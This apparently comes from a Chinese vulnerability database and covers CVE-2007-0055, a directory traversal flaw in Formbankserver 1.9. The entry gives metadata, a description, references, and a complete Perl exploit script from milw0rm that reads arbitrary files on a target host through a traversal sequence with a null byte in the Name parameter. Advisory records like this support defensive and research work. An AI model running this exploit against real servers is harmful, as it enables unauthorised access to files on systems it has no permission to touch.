Formbankserver 'formbankcgi.exe/AbfrageForm' 目录遍历漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111922 漏洞类型 路径遍历
发布时间 2007-01-01 更新时间 2007-01-04
CVE编号 CVE-2007-0055 CNNVD-ID CNNVD-200701-010
漏洞平台 Windows CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/3063
https://www.securityfocus.com/bid/86812
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200701-010
|漏洞详情
Formbankserver1.9版本中的formbankcgi.exe/AbfrageForm存在目录遍历漏洞。远程攻击者可以借助名字参数中的目录序列,来读取任意文件。
|漏洞EXP
#!perl
#found by Bl0od3r
#visit http://dc3.dl.am  
#download:http://www.download-tipp.de/cgi-bin/jump.cgi?ID=8796
#developer:http://www.fersch.de/formbankserver/
use LWP::Simple;
sub usage
{
die("file.pl host.com /../file.txt");
}
$host= $ARGV[0];
$file= $ARGV[1];
if (!$host) {
die("No Host.");
} ; if (!$file) {
die("No File.");
}
getprint "http://".$host ."/cgi-bin/formbankcgi.exe/AbfrageForm?Name=".$ARGV[1]."%00";

# milw0rm.com [2007-01-01]
|受影响的产品
Fersch Formbankserver 1.9
|参考资料

来源:MILW0RM
名称:3063
链接:http://www.milw0rm.com/exploits/3063
来源:VUPEN
名称:ADV-2007-0012
链接:http://www.frsirt.com/english/advisories/2007/0012
来源:SECUNIA
名称:23539
链接:http://secunia.com/advisories/23539
来源:OSVDB
名称:32545
链接:http://osvdb.org/32545
来源:XF
名称:formbankserver-name-directory-traversal(31214)
链接:http://xforce.iss.net/xforce/xfdb/31214
来源:MILW0RM
名称:3063
链接:http://milw0rm.com/exploits/3063